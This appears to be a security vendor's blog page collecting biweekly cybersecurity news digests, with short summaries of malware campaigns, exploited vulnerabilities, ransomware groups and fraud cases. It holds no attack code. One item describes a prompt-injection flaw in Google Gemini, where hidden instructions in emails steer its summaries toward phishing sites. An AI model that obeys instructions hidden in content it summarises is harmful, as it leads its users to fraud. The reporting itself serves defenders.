Your Connection, Their Cash: Threat Actors Misuse SDKs to Sell Your Bandwidth

Source: Unit 42 (Palo Alto Networks)
(Published: 21 August 2025)
Unit 42 observed attackers exploiting CVE-2024-36401 to deploy SDKs or modified apps that monetize victims’ bandwidth via network sharing. Read more.

Fake macOS help sites push Shamos infostealer via ClickFix technique

Source: Help Net Security
(Published: 25 August 2025)
Criminals are tricking macOS users into running commands that install the Shamos infostealer, using a social engineering tactic known as ClickFix. Read more.

Want more articles? Check out the previous edition of Security Signals here.

Take advantage of our free data evaluation.

REQUEST NOW

Security Signals (07/29/25 – 08/12/25)

Cybersecurity News

Welcome to your biweekly digest of curated cybersecurity intelligence.

Every two weeks, we bring you expert insights and handpicked articles covering the latest threats, threat actor activities, vulnerabilities, incident trends, and defensive strategies. Whether you’re on the front lines or shaping your organization’s security posture, Security Signals delivers the information you need to stay informed and ready.

For more articles, check out our #onpatrol4malware blog.

Adversary Intel
Attack Surface Watch
Incident Radar
Threat Lab

Turn Insights Into Action with Free Threat Intel

Security Signals gives you the insights and our Risk Indicators feeds help you apply them. Get free access to machine readable OSINT that helps you monitor emerging risks, validate indicators, and proactively defend your environment.

SUBSCRIBE FOR FREE

This Edition’s Articles

Adversary Intel: From APTs to Ransomware Groups

ShinyHunters Tactics Now Mirror Scattered Spider
Source: DARK READING
Recent cyber incidents reveal patterns in timing, shared infrastructure, and similar targets. This suggests a coordinated approach, combining ShinyHunters’ data theft with Scattered Spider’s social engineering. Read more.

Unmasking SocGholish: Silent Push Untangles the Malware Web Behind the “Pioneer of Fake Updates” and Its Operator, TA569
Source: SILENT PUSH
SocGholish, managed by TA569, acts as a Malware-as-a-Service provider, selling access to compromised systems. Their main method is fake browser update pop-ups, delivered via JavaScript on hacked sites. Read more.

Attack Surface Watch: Exploring Digital Risks

New Win-DDoS Flaws Let Attackers Turn Public Domain Controllers into DDoS Botnet via RPC, LDAP
Source: The Hacker News
SafeBreach researchers have found a new attack method, Win-DDoS, that could use thousands of public domain controllers to build a botnet for DDoS attacks. Read more.

Over 29,000 Exchange servers unpatched against high-severity flaw
Source: BLEEPING COMPUTER
More than 29,000 Exchange servers are still unpatched for CVE-2025-53786, a flaw that lets attackers move through Microsoft cloud and take over domains. Read more.

WinRAR zero-day exploited to plant malware on archive extraction
Source: BLEEPING COMPUTER
A recently fixed WinRAR vulnerability (CVE-2025-8088) was used in #phishing attacks to install RomCom malware. The bug allowed files to be extracted to any folder chosen by attackers. Read more.

Incident Radar: Breaches & Attacks

‘Chairmen’ of $100 million scam operation extradited to US
Source: BLEEPING COMPUTER
The U.S. Department of Justice charged four Ghanaian nationals for their roles in a $100M fraud ring involving romance scams and business email compromise. The suspects, extradited from Ghana, allegedly targeted U.S. companies and individuals from 2016 to 2023. Read more.

Threat Lab: Malware & Attack Analysis Deep Dive

CastleLoader
Source: PolySwarm
CastleLoader is a malware loader that has infected 469 devices since May 2025. It uses Cloudflare-themed ClickFix phishing and fake GitHub links to deliver info stealers and RATs. Read more.

Wave of 150 crypto-draining extensions hits Firefox add-on store
Source: BLEEPING COMPUTER
A campaign named ‘GreedyBear’ has targeted Firefox users with 150 fake extensions on the Mozilla add-ons store. These copy well-known crypto wallets like MetaMask and TronLink, stealing over $1,000,000. Read more.

SCENE 1: SoupDealer – Technical Analysis of a Stealth Java Loader Used in Phishing Campaigns Targeting Türkiye
Source: Malwation
A recent malware bypassed almost every public sandbox and antivirus, except Threat.Zone, and even evaded EDR/XDR in real-world incidents. Many banks, ISPs, and organizations were impacted. Read more.

Makop Ransomware Identified in Attacks in South Korea
Source: ASEC
ASEC has identified Makop ransomware attacks targeting South Korean users. The ransomware is spread through fake resumes, copyright emails, and now uses RDP for attacks. Read more.

Want more articles? Check out the previous edition of Security Signals here.

InfoSec Articles (07/01/25 – 07/15/25)

Cybersecurity News

???????

Welcome to our biweekly cybersecurity roundup. In these blog posts, we feature curated articles and insights from experts, providing you with valuable information on the latest cybersecurity threats, technologies, and best practices to keep yourself and your organization safe. Whether you’re a cybersecurity professional or a concerned individual, our biweekly blog post is designed to keep you informed and empowered.

For more articles, check out our #onpatrol4malware blog.

Behind the Clouds: Attackers Targeting Governments in Southeast Asia Implement Novel Covert C2 Communication

Source: Unit 42

Researchers discovered HazyBeacon, a sophisticated backdoor targeting government agencies in Southeast Asia. Read more.

Octalyn Stealer Unmasked

Source: CYFIRMA

Octalyn Forensic Toolkit on GitHub appears as research tool but functions as credential stealer. Built with C++ and Delphi, uses Telegram for control and hides in Windows startup. Read more.

Google Gemini flaw hijacks email summaries for phishing

Source: BLEEPING COMPUTER

Google Gemini for Workspace has a newly discovered vulnerability. Attackers can embed hidden instructions in emails that manipulate Gemini’s summary generation, potentially directing users to phishing sites. Read more.

Dark Web Profile: Arkana Ransomware

Source: SOCRadar

Arkana Ransomware made headlines attacking WOW! internet provider in March 2025. Linked to Qilin Ransomware network, they disguise extortion as “post-penetration testing services.” Read more.

Likely Belarus-Nexus Threat Actor Delivers Downloader to Poland

Source: BLEEPING COMPUTER

The FrostyNeighbor threat group (UNC1151), attributed to Belarus, is actively targeting Eastern European nations with malicious CHM files. Read more.

295 Malicious IPs Launch Coordinated Brute-Force Attacks on Apache Tomcat Manager

Source: The Hacker News

Researchers discovered 295 malicious IP addresses launching coordinated brute-force attacks against Apache Tomcat Manager interfaces worldwide. Read more.

Hackers are exploiting critical RCE flaw in Wing FTP Server

Source: BLEEPING COMPUTER

Wing FTP Server vulnerability is being actively exploited by threat actors. This flaw allows remote code execution with full system privileges without authentication. Read more.

macOS.ZuRu Resurfaces | Modified Khepri C2 Hides Inside Doctored Termius App

Source: SentinelOne

macOS.ZuRu malware hides in fake versions of popular apps like iTerm2 and Remote Desktop. Hackers trick users through poisoned search results. Read more.

GreyNoise Identifies New Scraper Botnet Concentrated in Taiwan

Source: GreyNoise

A scraper botnet variant has been identified with the user-agent “Hello-World/1.0”. Researchers are tracking it through unique behavioral patterns. Read more.

Count(er) Strike – Data Inference Vulnerability in ServiceNow

Source: Varonis

Researchers discovered a critical ServiceNow vulnerability dubbed “Count(er) Strike” that could expose sensitive data across hundreds of tables. It required only basic user access to exploit. Read more.

« Older Entries